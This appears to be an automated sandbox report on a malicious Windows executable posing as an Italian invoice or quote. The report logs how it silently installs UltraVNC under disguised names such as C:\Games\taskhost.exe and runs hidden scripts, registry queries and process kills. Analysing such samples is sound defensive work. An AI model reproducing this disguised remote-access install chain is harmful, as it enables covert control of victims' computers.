Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Games\taskhost.exe Code function: 42_2_005F54D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey, 42_2_005F54D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B6AD30 NtdllDefWindowProc_W, 0_2_00B6AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AD73D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W, 0_2_00AD73D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A605B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00A605B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F8520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString, 0_2_009F8520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0EA60 NtdllDefWindowProc_W, 0_2_00A0EA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F8BD0 NtdllDefWindowProc_W, 0_2_009F8BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A02CE0 NtdllDefWindowProc_W, 0_2_00A02CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow, 0_2_009FADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1CDD0 NtdllDefWindowProc_W, 0_2_00A1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A02E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00A02E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A09070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection, 0_2_00A09070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FB5C0 NtdllDefWindowProc_W, 0_2_009FB5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AB55C0 NtdllDefWindowProc_W, 0_2_00AB55C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FBC20 NtdllDefWindowProc_W, 0_2_009FBC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009F7D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W, 0_2_009F7D50
Source: C:\Games\taskhost.exe Code function: 42_2_005AB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces 42_2_005AB8D0
Source: C:\Games\taskhost.exe Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces 42_2_005AB8D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054FF706 0_3_054FF706
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054FB671 0_3_054FB671
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B62440 0_2_00B62440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0F6F0 0_2_00A0F6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B25910 0_2_00B25910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B37CE0 0_2_00B37CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B33C50 0_2_00B33C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B80210 0_2_00B80210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B7C3F0 0_2_00B7C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1E4E0 0_2_00A1E4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C0C5E2 0_2_00C0C5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A16600 0_2_00A16600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BFA7D0 0_2_00BFA7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A12743 0_2_00A12743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B78800 0_2_00B78800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C029F3 0_2_00C029F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BCCA10 0_2_00BCCA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B8CA50 0_2_00B8CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A22BA0 0_2_00A22BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF2DEE 0_2_00BF2DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B6CED0 0_2_00B6CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A14E40 0_2_00A14E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B80FB0 0_2_00B80FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD8F00 0_2_00BD8F00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0B090 0_2_00A0B090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0F180 0_2_00A0F180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF317C 0_2_00BF317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A03390 0_2_00A03390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E1490 0_2_009E1490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E3480 0_2_009E3480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B89470 0_2_00B89470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C05560 0_2_00C05560
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD3650 0_2_00BD3650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A1F740 0_2_00A1F740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B23750 0_2_00B23750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A63B10 0_2_00A63B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AF9B50 0_2_00AF9B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BD5C90 0_2_00BD5C90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E7AA0 0_2_009E7AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B7FD90 0_2_00B7FD90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A0FF50 0_2_00A0FF50
Source: C:\Games\viewer.exe Code function: 7_2_009667A0 7_2_009667A0
Source: C:\Games\viewer.exe Code function: 7_2_0098E0E0 7_2_0098E0E0
Source: C:\Games\viewer.exe Code function: 7_2_00990040 7_2_00990040
Source: C:\Games\viewer.exe Code function: 7_2_0098B1CB 7_2_0098B1CB
Source: C:\Games\viewer.exe Code function: 7_2_00999151 7_2_00999151
Source: C:\Games\viewer.exe Code function: 7_2_0098B3FD 7_2_0098B3FD
Source: C:\Games\viewer.exe Code function: 7_2_0096C340 7_2_0096C340
Source: C:\Games\viewer.exe Code function: 7_2_0099E498 7_2_0099E498
Source: C:\Games\viewer.exe Code function: 7_2_009867B0 7_2_009867B0
Source: C:\Games\viewer.exe Code function: 7_2_009918B4 7_2_009918B4
Source: C:\Games\viewer.exe Code function: 7_2_009A1804 7_2_009A1804
Source: C:\Games\viewer.exe Code function: 7_2_009A1924 7_2_009A1924
Source: C:\Games\viewer.exe Code function: 7_2_0099FDE4 7_2_0099FDE4
Source: C:\Games\viewer.exe Code function: 7_2_0096DD00 7_2_0096DD00
Source: C:\Games\viewer.exe Code function: 7_2_009A4EF0 7_2_009A4EF0
Source: C:\Games\viewer.exe Code function: 7_2_00999F09 7_2_00999F09
Source: C:\Games\viewer.exe Code function: 7_2_0096FF00 7_2_0096FF00
Source: C:\Games\taskhost.exe Code function: 42_2_00642820 42_2_00642820
Source: C:\Games\taskhost.exe Code function: 42_2_0063F0D0 42_2_0063F0D0
Source: C:\Games\taskhost.exe Code function: 42_2_006BA974 42_2_006BA974
Source: C:\Games\taskhost.exe Code function: 42_2_0059D9F0 42_2_0059D9F0
Source: C:\Games\taskhost.exe Code function: 42_2_0063FA50 42_2_0063FA50
Source: C:\Games\taskhost.exe Code function: 42_2_006C5A2B 42_2_006C5A2B
Source: C:\Games\taskhost.exe Code function: 42_2_006A4362 42_2_006A4362
Source: C:\Games\taskhost.exe Code function: 42_2_006C23F9 42_2_006C23F9
Source: C:\Games\taskhost.exe Code function: 42_2_006AA650 42_2_006AA650
Source: C:\Games\taskhost.exe Code function: 42_2_0059D700 42_2_0059D700
Source: C:\Games\taskhost.exe Code function: 42_2_006A3FD4 42_2_006A3FD4
Source: C:\Games\viewer.exe Code function: String function: 00985630 appears 40 times
Source: C:\Games\viewer.exe Code function: String function: 00985126 appears 60 times
Source: C:\Games\viewer.exe Code function: String function: 009850F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00A05220 appears 35 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009EAEE0 appears 68 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009E9320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009E87F0 appears 52 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 009EA880 appears 59 times
Source: C:\Games\taskhost.exe Code function: String function: 0059CCB0 appears 34 times
Source: Preventivo24.01.11.exe Static PE information: invalid certificate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2029764855.0000000005577000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B331000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1976018544.0000000000D6B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: lpk.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi5398.tmp.0.dr Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: classification engine Classification label: mal84.rans.troj.evad.winEXE@109/76@4/4
Source: ~.pdf.0.dr Initial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20AF0 FormatMessageW,GetLastError, 0_2_00B20AF0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B54BE0 GetDiskFreeSpaceExW, 0_2_00B54BE0
Source: C:\Games\viewer.exe Code function: 7_2_00963710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 7_2_00963710
Source: C:\Games\viewer.exe Code function: 7_2_009649C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 7_2_009649C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009EA740 LoadResource,LockResource,SizeofResource, 0_2_009EA740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Games\taskhost.exe Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\upd4A5F.tmp Jump to behavior
Source: Preventivo24.01.11.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\user\Desktop\Preventivo24.01.11.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
Source: unknown Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
